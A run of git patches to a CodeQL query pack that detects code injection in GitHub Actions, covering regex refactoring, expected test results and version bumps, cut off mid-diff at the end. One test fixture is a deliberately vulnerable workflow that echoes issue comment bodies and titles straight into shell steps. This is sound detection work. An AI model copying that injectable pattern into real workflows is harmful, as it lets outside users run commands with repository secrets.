.github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref new file mode 100644 index 00000000000..fbd758b6bd6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/PrivilegedCodeInjection.ql From 5908d6c567601c74b9fc2f684a0c8c811ca4170a Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:23:37 +0100 Subject: [PATCH 0124/1267] Fix tokens --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index f88e3b07850..e8f13962e81 100644 --- a/action.yml +++ b/action.yml @@ -24,7 +24,7 @@ runs: - name: Do something with context shell: bash env: - GITHUB_TOKEN: ${{ github.token }} - GH_TOKEN: ${{ github.token }} + GITHUB_TOKEN: ${{ inputs.token }} + GH_TOKEN: ${{ inputs.token }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 01d8d79e6d36b294d6638bee30ec6809cf96cf6b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:34:12 +0100 Subject: [PATCH 0125/1267] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d211b8fc2ba..4dd2ab2866e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.2 +version: 0.0.3 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 61ef9d40ab5..90647d42240 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.2 +version: 0.0.3 groups: - actions - queries From 6cb15f06bceaa9c6304743f5e4c6a49015f82c00 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:54:21 +0100 Subject: [PATCH 0126/1267] fix(fn): Apply json wrappers to source regexps --- ql/lib/codeql/actions/Ast.qll | 5 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 18 +++--- .../codeql/actions/dataflow/FlowSources.qll | 18 +++--- .../CWE-094/.github/workflows/json_wrap.yml | 59 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++ 6 files changed, 89 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 4a7ff12b4f9..91612c5836b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -9,6 +9,11 @@ module Utils { .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } + + bindingset[regex] + string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f45565caed7..3fa1769e762 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -813,28 +813,24 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) -} - -bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a586cab4a32..ca1d2163786 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -28,7 +28,7 @@ private predicate isExternalUserControlledIssue(string context) { exists(string reg | reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -45,18 +45,20 @@ private predicate isExternalUserControlledPullRequest(string context) { "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") + Utils::normalizeExpr(context) + .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") + Utils::normalizeExpr(context) + .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) } bindingset[context] @@ -68,7 +70,7 @@ private predicate isExternalUserControlledGollum(string context) { "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -89,7 +91,7 @@ private predicate isExternalUserControlledCommit(string context) { "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -98,7 +100,7 @@ private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -118,7 +120,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml new file mode 100644 index 00000000000..b17a1fecbeb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -0,0 +1,59 @@ +name: Issue Comment Created + +on: + issue_comment: + types: + - created + +jobs: + jira: + runs-on: ubuntu-latest + if: ${{ github.event.comment.body == '/jira ticket' }} + steps: + - run: echo ${{ github.event.comment.body }} + + - name: Login + uses: atlassian/gajira-login@v3 + env: + JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }} + JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }} + JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} + + - name: SearchParam + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Search + id: search + uses: tomhjp/gh-action-jira-search@v0.2.1 + with: + jql: 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Log + run: echo "Found issue ${{ steps.search.outputs.issue }}" + + - name: Create + id: create + if: steps.search.outputs.issue == '' + uses: atlassian/gajira-create@v3 + with: + project: ${{ secrets.JIRA_PROJECT }} + issuetype: Task + summary: '${{ github.event.repository.name }}: ${{ github.event.issue.title }}' + description: | + *Issue Link:* ${{ github.event.issue.html_url }} + + ${{ github.event.issue.body }} + fields: '{"customfield_10006": ${{ toJSON(secrets.JIRA_EPIC_TICKET) }}, "customfield_17401":{"value":${{ toJSON( secrets.JIRA_LAYER_CAKE )}}}}' + + - name: Add Comment + if: steps.search.outputs.issue == '' && steps.create.outputs.issue != '' + uses: actions/github-script@v6 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Thanks, Jira [${{steps.create.outputs.issue}}] ticket created.' + }) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 23e50256756..14b0c535ac6 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -234,6 +236,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9101c80a595..bdb5ae3ea55 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -229,6 +231,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | From d9e589c6e7d913c2e3a987c0f2a30676a47df15b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:58:46 +0100 Subject: [PATCH 0127/1267] Remove unnecessary boundary anchors --- ql/lib/codeql/actions/Ast.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 64 +++++++++---------- 2 files changed, 34 insertions(+), 36 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91612c5836b..ecc0ad16f5f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -12,7 +12,11 @@ module Utils { bindingset[regex] string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca1d2163786..007ace43bd0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -25,9 +25,7 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - exists(string reg | - reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] - | + exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -37,12 +35,12 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" + "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", + "github\\.event\\.pull_request\\.head\\.label", + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.repo\\.description", + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -51,14 +49,12 @@ private predicate isExternalUserControlledPullRequest(string context) { bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) } bindingset[context] @@ -66,8 +62,8 @@ private predicate isExternalUserControlledGollum(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -79,16 +75,15 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", + "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -98,7 +93,7 @@ private predicate isExternalUserControlledCommit(string context) { bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | - reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) @@ -109,15 +104,14 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.workflow\\.path\\b", - "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", - "\\bgithub\\.event\\.workflow_run\\.display_title\\b", - "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_commit\\.message", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From e0bbb66be47b1076532dcf1a179f1220fdf55e73 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 15:11:21 +0100 Subject: [PATCH 0128/1267] Try to fix `actions-all` suite --- ql/src/codeql-suites/actions-all.qls | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 2439b95a8e5..8c0f580a7ad 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -1,2 +1,5 @@ - description: Standard Code Scanning queries for Actions -- queries: . \ No newline at end of file +- queries: . +- include: + kind: + - path-problem From 09c2ba4280c91840c176bab80b056b5aca9e5246 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 16:39:18 +0100 Subject: [PATCH 0129/1267] Make action download `actions-all` --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 56615fa80ce..0fcdd81ee3f 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), From e60c0b875fd69025fc695601e8981bbf4dae1b6f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 22:01:06 +0000 Subject: [PATCH 0130/1267] Fix inputs for composite action --- action.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/action.yml b/action.yml index e8f13962e81..9281212ea24 100644 --- a/action.yml +++ b/action.yml @@ -26,5 +26,8 @@ runs: env: GITHUB_TOKEN: ${{ inputs.token }} GH_TOKEN: ${{ inputs.token }} + INPUT_SOURCE-ROOT: ${{ inputs.source-root }} + INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} + INPUT_SUITE: ${{ inputs.suite }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 8906bd96350661569f8a29a0790b6700b8aa85e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 11:00:22 +0100 Subject: [PATCH 0131/1267] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4dd2ab2866e..7d2de60df75 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.3 +version: 0.0.4 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml 